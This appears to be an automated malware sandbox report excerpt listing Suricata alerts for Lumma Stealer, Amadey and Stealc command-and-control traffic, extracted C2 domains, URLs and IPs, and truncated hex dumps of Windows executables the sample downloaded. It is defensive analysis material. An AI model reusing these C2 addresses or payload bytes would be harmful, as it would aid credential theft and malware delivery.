                          Source: Network trafficSuricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.4:59645 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.4:54087 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:63854 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:63856 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:63867 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:63873 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:63884 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:63896 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:63895 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:63909 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:63908 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:63908 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:63923 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:63908
                          Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:63908 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:63908
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:63931 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:63908 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.4:63970 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:64006 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:63867 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63867 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:63854 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63854 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:63873 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:63970 -> 188.114.96.3:443
                          Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                          Source: Malware configuration extractorURLs: founpiuer.store
                          Source: Malware configuration extractorURLs: navygenerayk.store
                          Source: Malware configuration extractorURLs: fadehairucw.store
                          Source: Malware configuration extractorURLs: necklacedmny.store
                          Source: Malware configuration extractorURLs: crisiwarny.store
                          Source: Malware configuration extractorURLs: scriptyprefej.store
                          Source: Malware configuration extractorURLs: presticitpo.store
                          Source: Malware configuration extractorURLs: thumbystriw.store
                          Source: Malware configuration extractorIPs: 185.215.113.43
                          Source: global trafficTCP traffic: 192.168.2.4:63711 -> 162.159.36.2:53
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 02 Nov 2024 06:16:08 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Sat, 02 Nov 2024 04:46:29 GMTETag: "160032-369d8-625e6bc2addf2"Accept-Ranges: bytesContent-Length: 223704Vary: Accept-EncodingContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 eb 9f 25 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 1a 02 00 00 2c 01 00 00 00 00 00 ee 39 02 00 00 20 00 00 00 40 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 39 02 00 53 00 00 00 00 40 02 00 ce 28 01 00 00 00 00 00 00 00 00 00 00 48 03 00 d8 21 00 00 00 80 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 19 02 00 00 20 00 00 00 1a 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ce 28 01 00 00 40 02 00 00 2a 01 00 00 1c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 46 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 39 02 00 00 00 00 00 48 00 00 00 02 00 05 00 34 0e 01 00 64 2b 01 00 03 00 00 00 01 00 00 06 d0 05 01 00 63 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 07 00 00 00 08 00 00 00 09 00 00 00 0a 00 00 00 0b 00 00 00 0c 00 00 00 04 00 00 00 05 00 00 00 06 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00 06 00 00 00 0a 00 00 00 0b 00 00 00 0c 00 00 00 00 00 00 00 07 00 00 00 08 00 00 00 09 00 00 00 3a 02 28 2d 00 00 0a 02 03 7d 01 00 00 04 2a 3e 02 04 28 2e 00 00 0a 02 03 7d 01 00 00 04 2a 56 02 04 6f 2f 00 00 0a 04 28 30 00 00 0a 02 03 7d 01 00 00 04 2a 42 02 04 05 28 30 00 00 0a 02 03 7d 01 00 00 04 2a a6 02 03 04 28 31 00 00 0a 02 03 72 45 01 00 70 d0 03 00 00 01 28 32 00 00 0a 6f 33 00 00 0a a5 03 00 00 01 7d 01 00 00 04 2a 6a 03 72 53 01 00 70 02 7b 01 00 00 04 6f 34 00 00 0a 02 03 04 28 35 00 00 0a 2a 1e 02 7b 01 00 00 04 2a 9a 03 0f 00 28 39 00 00 0a 54 38 06 00 00 00 03 03 4a 17 58 54 03 4a 17 58 28 10 00 00 06 02 28 3d 00 00 0a 2d e9 2a 22 02 17 28 0e 00 00 06 2a 32 02
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 02 Nov 2024 06:16:13 GMTContent-Type: application/octet-streamContent-Length: 2964480Last-Modified: Sat, 02 Nov 2024 05:22:32 GMTConnection: keep-aliveETag: "6725b718-2d3c00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 50 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 30 00 00 04 00 00 90 79 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 7e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 92 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 7a 6a 69 74 77 71 6c 64 00 90 2a 00 00 b0 05 00 00 82 2a 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 64 75 69 7a 68 73 77 00 10 00 00 00 40 30 00 00 04 00 00 00 16 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 30 00 00 22 00 00 00 1a 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 02 Nov 2024 06:16:21 GMTContent-Type: application/octet-streamContent-Length: 2143744Last-Modified: Sat, 02 Nov 2024 05:22:46 GMTConnection: keep-aliveETag: "6725b726-20b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 20 73 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 73 00 00 04 00 00 2b ac 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6e 76 65 6c 61 6f 67 00 10 1a 00 00 00 59 00 00 06 1a 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6b 6d 64 6a 66 64 6a 00 10 00 00 00 10 73 00 00 04 00 00 00 90 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 73 00 00 22 00 00 00 94 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 02 Nov 2024 06:16:27 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Sat, 02 Nov 2024 05:01:44 GMTConnection: keep-aliveETag: "6725b238-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 30 b2 25 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 fb 8f 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 02 Nov 2024 06:16:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 02 Nov 2024 06:16:33 GMTContent-Type: application/octet-streamContent-Length: 2866688Last-Modified: Sat, 02 Nov 2024 05:02:08 GMTConnection: keep-aliveETag: "6725b250-2bbe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2c 00 00 04 00 00 45 06 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6b 72 77 74 73 66 73 73 00 60 2b 00 00 a0 00 00 00 5e 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 73 73 65 76 71 6a 64 00 20 00 00 00 00 2c 00 00 04 00 00 00 98 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2c 00 00 22 00 00 00 9c 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 